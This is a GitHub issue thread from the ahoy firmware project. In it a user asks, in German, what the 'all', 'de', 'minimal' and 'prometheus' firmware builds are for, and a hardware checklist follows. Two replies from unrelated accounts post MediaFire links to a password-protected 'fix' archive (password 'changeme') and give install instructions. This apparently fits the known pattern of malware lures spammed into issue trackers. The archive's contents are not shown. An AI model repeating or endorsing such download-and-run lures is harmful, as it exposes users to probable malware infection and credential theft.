lumapu/ahoy #1741: unterschiedliche Dateiversionen - wofür ist welche... all,minimal...

cptechnik, 2024-08-28:
Wo kann ich nachlesen, wofür die verschiedenen Versionen sind...
elf.7z
- all
- de
- minimal 
- prometheus

... ok, is klar, nix installieren, was du nicht kennst...
- de ... statt englisch, deutscher Text im WebIF, ok...
aber was ist all gegenüber der normalen *.bin, und wie minimal ist minimal, und was war nochmal prometheus?

Vielleicht was fürs Wiki/FAQ - oder habe ich etwas übersehen?

## Hardware 
  * [ x ] ESP8266
  * [ x ] ESP32
  * [ ] Raspberry Pi

Modelname: ______
Retailer URL: ______

### nRF24L01+ Module
* [ ] nRF24L01+ you verified this is a **Plus model** capable of the required 256kBit/s mode
* [ ] **square dot** indicates original Nordic Semicon chip 
* [ ] **round dot** indicates copy-cat / counterfeit SI labs chip

### Antenna:
* [ ] circuit board
* [ x ] external antenna (SMA)

### Power Stabilization:
* [ ]  100uF Electrolytic Capacitor 
connected between +3.3V and GND (Pin 1 & 2) of the NRF Module
* [ ] Voltage stabilizing motherboard

### Version / Git SHA: 
Version: _._.__
Github Hash: _______

### Build & Flash Method:
* [ x ] AhoyDTU Webinstaller
* [ ] VSCode - Platform IO
* [ ] Arduino
* [ ] ESP Tools

### Debugging:
* [ ] USB Serial Log (attached)
* [ ] Setup settings (use our templates ... to be added)

cnhbliyou, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Gubi2023, 2024-08-28:
https://github.com/lumapu/ahoy/issues/1734#issuecomment-2305244571

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

closed 2024-08-28 by lumapu